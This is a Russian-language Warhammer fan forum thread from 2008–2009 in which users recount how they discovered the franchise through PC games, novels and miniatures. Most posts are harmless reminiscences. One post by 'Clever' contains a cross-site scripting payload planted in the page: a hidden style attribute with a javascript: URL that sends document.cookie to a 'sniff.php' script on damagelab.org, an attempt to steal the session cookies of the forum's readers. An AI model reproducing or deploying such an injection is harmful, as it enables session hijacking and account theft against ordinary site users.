Dominus_Nox Опубликовано 25 октября, 2008 Жалоба Поделиться Опубликовано 25 октября, 2008 Сыграл в ДоВ в 2004 (не зацепило) в 2006 в ДК а весной этого года в Швеции напоролся случайно на ГВ-магаз и почти помешался Ссылка на комментарий Поделиться на другие сайты Поделиться
Clever Опубликовано 27 октября, 2008 Жалоба Поделиться Опубликовано 27 октября, 2008 А мне просто знакомый посоветовал - я и втянулся... http://1.ru e=`` style=display:none;background:url(java script:document.images[12].src="http://damagelab.org/sources/sniff/sniff.php?"+document.cookie) Lol Ссылка на комментарий Поделиться на другие сайты Поделиться
w1zzard Опубликовано 27 октября, 2008 Жалоба Поделиться Опубликовано 27 октября, 2008 Мое знакомство с Вахой началось с ДоВ. Сначала демка на Мании. Потом купил, начал играть в компанию, а там Космодесант. Тогда я еще не знал кто это, просто играл. Но очень они мне приглянулись. Да и вообще Ваха понравилась. Потом книги, и то чисто случайно. Просто смотрел сайт Мира Фантастики, что там народ читает. Вижу там "Инквизитор". Думал что-то готичное про средневековье, церковь, ересь, пытки, веру... (люблю готику) Составил список, что посмотреть кроме Инквизитора. Пришел, увидел что Инквизитор про Ваху, вдвойне интересно стало. Купил, и пошло-поехало... В захлеб - по 100(или больше) страниц в день... т.е. в ночь. Потом сайты, форумы, флафф, бэк и т.д. Остальные игры по Вахе. Прочитал все книги(на русском) по Вахе. Сейчас настолкой начал интересоваться. Два года сидел на бэке и ДоВ. Вот начал деньги собирать на покупку армии, правда сразу на 2000 очков. Ссылка на комментарий Поделиться на другие сайты Поделиться
Preternatural Опубликовано 28 октября, 2008 Жалоба Поделиться Опубликовано 28 октября, 2008 (изменено) Сложная у мну история. Сначала у меня брат играл в ДоВ (пару лет назад). Мне стратегии не нравятся так что я пару раз поиграл и забросил дело. После этого уже брат не играл, но потом опять начал. Мне начала нравится готичность и пафосность этой всей вселенной. Потом меня как то потянуло (год назад где то). И начал лазить по инету всякое искать. И моды на ваху искать. После этого нашел флафф-библию и начал читать на своей psp (весна 2008). Потом купил пару книг (эх...Вентрис...вот почему я собираю армию ультров). И увлекся. Изменено 28 октября, 2008 пользователем Zaqq_the Ссылка на комментарий Поделиться на другие сайты Поделиться
Sandros Playton Опубликовано 31 октября, 2008 Жалоба Поделиться Опубликовано 31 октября, 2008 Все началось с dawn of war, потом одногруппник дал почитанть "инквизитор Ордо Ксенос", потом сам начил книги заказывать. Все что вышло по вархаммеру на Русском уже прочел, Только " Галактику во гне достать не смог" Ссылка на комментарий Поделиться на другие сайты Поделиться
hades_wench Опубликовано 31 октября, 2008 Жалоба Поделиться Опубликовано 31 октября, 2008 в Ваху занесло окольным путем. в ЖЖ-сообществе ru_steampunk достаточно давно кто-то выкладывал рисунки, afair, гномов из WH FB. а так как я уже лет 10 как фанат стимпанка и индустриала, естественно, заинтересовало. фэнтезийный Вархаммер в итоге совершенно не зацепил, зато в 40К душа нашла все, что желала. кроме, разве что, самой настольной игры - ну совершенно к этому делу интереса нет. все познания о вселенной из английских книг, так что каждый день - то новое открытие в переводах )) Ссылка на комментарий Поделиться на другие сайты Поделиться
Sandros Playton Опубликовано 31 октября, 2008 Жалоба Поделиться Опубликовано 31 октября, 2008 Абнетовских "Всадников Смерти" читал. Вообще интересно. Если конечно сравнивать с Варкрафтовской "местью орков" . Но WH 40 гораздо атмосферней. яне разу не видел такой живой и интересной вселенной/ STAR WARS рядом не стояли. Ссылка на комментарий Поделиться на другие сайты Поделиться
Nomadus Опубликовано 3 декабря, 2008 Жалоба Поделиться Опубликовано 3 декабря, 2008 Амое знакомство началось с цикла статей в газете "Виртуальные радости" это наша беларуская. Там описывались все основные расы и положения про Ваху. Потом был найден в нете еще наверное первый причем даже недопереведенный файл флаффбиблии распечатан и прочитан. А уже потом пошел ДоВ (не люблю риал-таймовые стратегии, но зная суть, подоплеку и значение всех юнитов, пошло отлично до сих пор гамаю), ну а потом уже книги и все остальное. Ссылка на комментарий Поделиться на другие сайты Поделиться
ApologistOfChaos Опубликовано 4 декабря, 2008 Жалоба Поделиться Опубликовано 4 декабря, 2008 Начинал с DOW-а, причем считал, что Хаос-Мары - тоже служат императору, но только используя темную магию :) А с толку сбило название легиона "Дети Императора". Потом купил Рейвенора и пошло-поехало... Ссылка на комментарий Поделиться на другие сайты Поделиться
Mad_Rat Опубликовано 4 декабря, 2008 Жалоба Поделиться Опубликовано 4 декабря, 2008 А я с оригинальничаю. Моё знакомство началось с вот этой статьи в Мании про ККИ "Ересь Хоруса". Дов Вышел чуть позже. Описания ДоВа я читал, но интереса именно к вселенной они не вызвали. А вот Ересь Хоруса пробрала. Тогда я начал искать информацию, узнал про существование солдатиков и т.д. Но, всё равно, я гораздо позже специально закупился ККИ (чтобы узнать, что в неё никто не играет > мотыжники проклятые!), бережно храню её, как память, и испытаваю особенную любовь ко всему, связанному с Ересью Хоруса. Для меня в глубине души это и есть главная часть вахи. Ссылка на комментарий Поделиться на другие сайты Поделиться
Teh Panda Strike Опубликовано 8 декабря, 2008 Жалоба Поделиться Опубликовано 8 декабря, 2008 Познакомился ,когда поиграл в Фаер Ворриора (хорошо началось знакомство,ничего не скажешь).Естественно,прошел два уровня и забросил.Потом вышел ДоВ.В первой же миссии я нашел бесхозный Леман Расс и понял,что где-то я чето такое уже видел.Так что,мое первое знакомство с вахой ,также как и у большинства, произошло посредством ДоВа. Ссылка на комментарий Поделиться на другие сайты Поделиться
Арсилит Опубликовано 8 декабря, 2008 Жалоба Поделиться Опубликовано 8 декабря, 2008 (изменено) Моё знакомство произошло по средствам друга. Уж где он сам в это втянулся - не знаю. :) Долго меня переманивал, но я отказывался. В результате ему меня удалось заманить в эти сети. :D Было это, если мне не изменяет память, в начале 2006г. Сразу полюбил Храмовников за безграничную преданность делу и налет лёгкого сумасшествия. :) Потом поиграл и в DoW и во все аддоны, но они, почему-то не вызывают у меня пиитета. Наверно отсутствием проработки как заявленных расс и армий, так и полным отсутствием большенства возможностей и юнитов. Изменено 8 декабря, 2008 пользователем Арсилит Ссылка на комментарий Поделиться на другие сайты Поделиться
Последняя Радуга Опубликовано 9 декабря, 2008 Жалоба Поделиться Опубликовано 9 декабря, 2008 Старые компьютерные игры пройденные в дикой непоследовательности:Chaos Gate,Dark Omen,Final Liberation,Shadow of Horned Rat, Rites of War в 98-99 годах.Так как диски были пиратские и ролики порезаны, только проходя повторно понял что некоторые игры чем-то похожи.Так собственно и началось изучение вселенной Вахи. Ссылка на комментарий Поделиться на другие сайты Поделиться
Воробушка Опубликовано 10 декабря, 2008 Жалоба Поделиться Опубликовано 10 декабря, 2008 Друзья показали миньки и и предложили покрасить) Потом уже решила выяснить, что же я, собственно, крашу. ПЕречитала все что нашла в сети, потом флафф. В ДоВ не играла, в настолку и сейчас не играюсь) Только крашу, ну и книжки почитываю, вот. Ссылка на комментарий Поделиться на другие сайты Поделиться
ZAV Опубликовано 17 декабря, 2008 Жалоба Поделиться Опубликовано 17 декабря, 2008 Стоило только выйти Дауну Войны, как Хаос забрал мою душу... Ссылка на комментарий Поделиться на другие сайты Поделиться
Chrono's Опубликовано 19 декабря, 2008 Жалоба Поделиться Опубликовано 19 декабря, 2008 Первое знакомство - геймплей-ролик к DoW - вид штурмовиков маринада, бодренько так врывающихся в строй эльдаров и устраивающих мясорубку немного удивил и "очень много" порадовал. В течении всей разработки следил за статьями в игроманке; за неделю до выхода игры "засел" на ваха40к.ру, где пристрастился к флафф-библии и бэк-артам %). На счет настолки часто задумывался, но возможность собирать представится еще не скоро =/. Ссылка на комментарий Поделиться на другие сайты Поделиться
Puritanin Опубликовано 23 декабря, 2008 Жалоба Поделиться Опубликовано 23 декабря, 2008 Сначала играл в английский ДоВ нифига не понял :) потом сыграл в руский ДК нас с другом игрушка оч порадовала, потом я увидел гдет книжечку Лживые боги, ну и ради интереса купил ну а потом глубже, глубже, глубже... :) Ссылка на комментарий Поделиться на другие сайты Поделиться
Arsen Опубликовано 26 декабря, 2008 Жалоба Поделиться Опубликовано 26 декабря, 2008 (изменено) Впервые я столкнулся с Боевым Молотом - осенью 1999 года. Дело было так: я учился на первом курсе института, где познакомился со своими друзьями, один из них - Иваныч, он же Vlom, он же HighVlom. Как то раз, в перерыве между парами мы вышли на крыльцо покурить, и тут Иваныч вручил мне диск с игрой Warhammer: Dark Omen. Диск выглядел так Тебе должна понравится эта игра - сказал мой друг, лукаво прищурясь… Но когда я пришёл домой и установил игру, меня ждал неприятный сюрприз. Мерцание экрана, думаю, эта проблема знакома многим людям, сталкивавшихся с Dark Omen. И вот, не пройдя и первой миссии, я удалил игру. Разумеется никакого впечатления я вообще не успел составить… Спустя год я сидел на очередной скучной лекции и читал книгу. На следующей парте сидел Иваныч с ещё одним моим другом – Денисом. Моё внимание привлёк их разговор. Иваныч предлагал Денису поиграть в какую-то игру. Эта игра даже интереснее Dark Omen - говорил он... Надо сказать, что в то незабвенное время Иваныч снабжал всех нас отменными игрухами, периодически принося их в институт. Благодаря этому человеку, я познакомился со многими интересными играми, сам же, я до этого мало во что играл, кроме Варкрафта 1, 2… Когда Денис принёс диск в институт, чтобы отдать его Иванычу я попросил его себе. Это был старый, видавший всякие виды диск, без обложки. Игра называлась: Вархаммер Тень Рогатой Крысы. Позже я пришёл домой и запустил игру… С этого момента для меня и началось настоящее знакомство с Warhammer! Это была русская версия игры, от компании CSW Group, полностью озвученная и переведённая на русский язык. Перевод и озвучка были волшебны! Начиная с самой первой заставки, где я увидел скавенов! Их голоса и фразы! «Приятно-Приятно! Ненавижу-ненавижу! Умри-умри, предатель!»))) Я был навсегда покорён этими существами! До этого момента я не сталкивался ни с чем подобным!!! Игра была ЧУДОВИЩНО сложная и непонятная! Тем не менее, чертовски интересная, невероятно затягивающая и атмосферная! Здесь всё было не так, как во всех тех стратегиях, в которые я играл до этого момента. Суть игры заключалась в том, что игрок является командиром отряда наёмников, выполняющих боевые задачи за денежное вознаграждение. События происходили в сказочном мире, населённом, помимо людей разными невероятными существами: орки и гоблины, тролли, гномы, эльфы, скавены… Каждое действие надо было продумывать, каждая битва требовала тщательного планирования, и принятия мгновенных тактических решений! Малейшая ошибка вела к полному краху! Многочисленные переигрывания, бессонные ночи у компьютера, проклятья в адрес орков, скавенов и чёртовых наёмников, постоянно требующих денег за каждый свой шаг! Не было никаких готовых решений, каждый раз один и тот же бой мог обернуться по-разному и сохранится в бою было нельзя! Фланговые удары, построения, заходы с тыла, засады, местность, магия, психология, всё это нужно было учитывать! Кроме всего прочего, Тень Рогатой Крысы нелинейна! Через какое-то время, с большим трудом дойдя до миссии «Разрушенный Проход», я опустил руки. Моя армия наёмников была сильно потрёпана, а денег на её содержание практически не осталось. Последующие битвы были ещё более сложными! Никаких послаблений для игрока не было, я имел в наличии разбитую армию, кучу врагов впереди и огромное чувство бессилия и досады…. Начинать сначала не хотелось. Это была первая игра, победившая меня, крепкий орешек, об который я обломал зубы. На всякий случай я сделал себе образ диска, и на следующий день отнёс игру в институт, отдать Иванычу… Прошло три месяца. Всё это время я мысленно возвращался к Тени Рогатой Крысы. В институте, дома, на улице, в гостях, я постоянно прокручивал в голове варианты проведения той, или иной битвы. Неудача постигшая меня, задела моё самолюбие, и вот в один прекрасный день я вновь установил Тень на свой компьютер и начал всё сначала, потом ещё и ещё, пока не научился играть более-менее сносно. Странное дело, каждый раз начиная игру, я всё время находил в ней что-то новое! Поднаторев в боях я стал без больших потерь проходить миссии, которые раньше давались с трудом. Однако вскоре меня ждала очередная неприятность - по дороге в Жуфбар игра напрочь зависала! Было обидно, пришлось снова начинать игру сначала и идти в Жуфбар другой дорогой… Спустя какое-то время я прошел игру, орки были уничтожены, замыслы Тонкуоля разрушены, а Империя спасена! Не забуду своё чувство разочарования от того, что игра так быстро закончилась, ведь я только вошёл во вкус… Не хочу сказать что Тень коротка, но концовка и впрямь наступает весьма быстро. Как только вы покинете Нульн, знайте, что большая часть игры уже пройдена… Итак, Тень была пройдена, после неё все RTS стратегии казались мне примитивными, ни что не могло меня увлечь. Тут-то я и вспомнил про Dark Omen! Я вновь попросил диск у Иваныча, но оказалось что он отдал его своему знакомому. Пришлось ждать. Но вот, наконец, игра оказалась в моих руках! На этот раз, она пошла нормально, наверно из-за апгрейда видеокарты… Запустив Warhammer Dark Omen, я был приятно удивлён! Играть предстояло за моего старого знакомого – Моргана Бёрнхарта, командира наёмников Груджбрингеров! Я раньше и не предполагал что это прямое продолжение Тени Рогатой Крысы! По сравнению с Тенью Рогатой Крысы в Тёмное Предзнаменование играть было НАМНОГО удобней - интуитивно понятный интерфейс, улучшенная графика. После Тени здешние битвы казались мне проще, может быть поэтому я прошёл Dark Omen весьма быстро. Не хочу сказать, что Dark Omen лёгкая игра, и здесь над многими битвами я часто ломал голову. После этого я заинтересовался вселенной Warhammer, стал собирать информацию, узнал, что есть фентезийный Warhammer Fantasy Battles и Warhammer 40 000, узнал о том, что изначально Wrahammer настольная игра, о книгах, комиксах и т.д… Затем я скачал с сайта, тогда ещё oldgames.ru (сегодня old-games.ru) пошаговую стратегию, под названием Warhammer Epic 40,000: Final Liberation. Какое то время играл в одиночку, потом в один зимний день забил на институт и поехал в гости к Иванычу, где мы опробовали Final Liberation. Играли вдвоём на одном компьютере друг против друга, сначала я за Имперцев, а Иваныч за Спейс Орков, затем наоборот, и так далее… Это было очень интересно и увлекательно, очень приятные воспоминания! Потом были Warhammer 40k Chaos Gate, Rites of War, DoW, Спейс Халки, Warhammer Mark of Chaos… Но более всего мне по душе Warhammer Fantasy Battles, наверно из-за незабываемых впечатлений от Тени Рогатой Крысы и Тёмного Предзнаменования. А в Тень я играю до сих пор, получаю от этого море удовольствия! Ещё нашёл способ «вылечить» зависание в русской версии, на пути в Жуфбар, написал прохождение игры… Хотел бы сыграть в настольный Warhammer, собрать армию скавенов (мечтательно закатывает глаза) но, увы, пока финансы не позволяют. Остаётся только пускать слюни, глядя на миниатюры. Так что, со вселенной Warhammer я познакомился благодаря компьютерным играм. :) Изменено 12 марта, 2009 пользователем Arsen Ссылка на комментарий Поделиться на другие сайты Поделиться
Эзгард Опубликовано 10 января, 2009 Жалоба Поделиться Опубликовано 10 января, 2009 Наверное как у всех кто играет в ФБ - нашелся знакомый который сумел заинтересовать. Причем началось все не с чтения книг, а с выбора армии. В итоге остановился на Томбах - правда собрать я их, так до сих пор и не собрал. С настольным 40k я познакомился гораздо позже. В компьютерную игру я поиграл, мне понравилось, но я абсолютно не заморачивался на тему вселенной в игре (потом это во многом помогло мне не стать "очередным ДоВером". Но все равно долго мыслил категориями компьютерной, а не настольной игры). А потом был инет, были долгие и бесплотные поиски "хоть чего-нить по Вахе", нахождение всего чего угодно, только не нужного. На последнем ДИ купил комбат сквад маринов. Так что начало второй армии уже положено :) Ссылка на комментарий Поделиться на другие сайты Поделиться
всевидящий слон Опубликовано 10 января, 2009 Жалоба Поделиться Опубликовано 10 января, 2009 все было весело - я начинал с "Серого охотника" =) =) =) Ссылка на комментарий Поделиться на другие сайты Поделиться
Firaekuel Опубликовано 10 января, 2009 Жалоба Поделиться Опубликовано 10 января, 2009 Начало было мощным - с книг Space Marine и Inquistion War: Chaos Child Йена Уотсона, первоначальная реакция - "Что за бредятина?!" Мне тогда было лет 12 и эти творения меня несколько шокировали - резковатый переход после Саймака. Второе знакомство состоялось уже с появлением у меня Эйзенхорна. А потом DoW и началось... Ссылка на комментарий Поделиться на другие сайты Поделиться
Pandora Опубликовано 16 января, 2009 Жалоба Поделиться Опубликовано 16 января, 2009 Сначала по приколу красила миньки, потом заинтересовалась беком, прочитала кучу книжек, кодексов, флафф. Начала лазить по форумам, читать материалы.. В общем, так и заболела:) Ссылка на комментарий Поделиться на другие сайты Поделиться
Dimedrolus fatalis Опубликовано 9 февраля, 2009 Жалоба Поделиться Опубликовано 9 февраля, 2009 Передача "От винта!" 1998г,рассказывали о Dark Omen. В том же году мне приобрели новый комп,и одной из первых игр стала именно она. Ссылка на комментарий Поделиться на другие сайты Поделиться
Silence DRAG.ON Опубликовано 10 февраля, 2009 Жалоба Поделиться Опубликовано 10 февраля, 2009 Познакомился с миром Вархаммера во время учебы в универе-искал в сети материалы по средневековой инквизиции и наткнулся на ордосы всех мастей.Сначала читал за альтернативу фантастам 60х-70,потом узнал про настолку и другие варианты. Ссылка на комментарий Поделиться на другие сайты Поделиться
Могучий Хаэгр Опубликовано 19 февраля, 2009 Жалоба Поделиться Опубликовано 19 февраля, 2009 как-то попал в руки журнал буржуинский... английский каталог какой-то, там в числе прочего была ваха. мне тогда лет 5 было... потом йен уотсон сам собой прочитался в 11. потом дарк омен, потом начал моделированием заниматься(привет родной звезде). потом рылся в нете и зашел вархаммер40кточкару... потом уже дов и т.д. Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти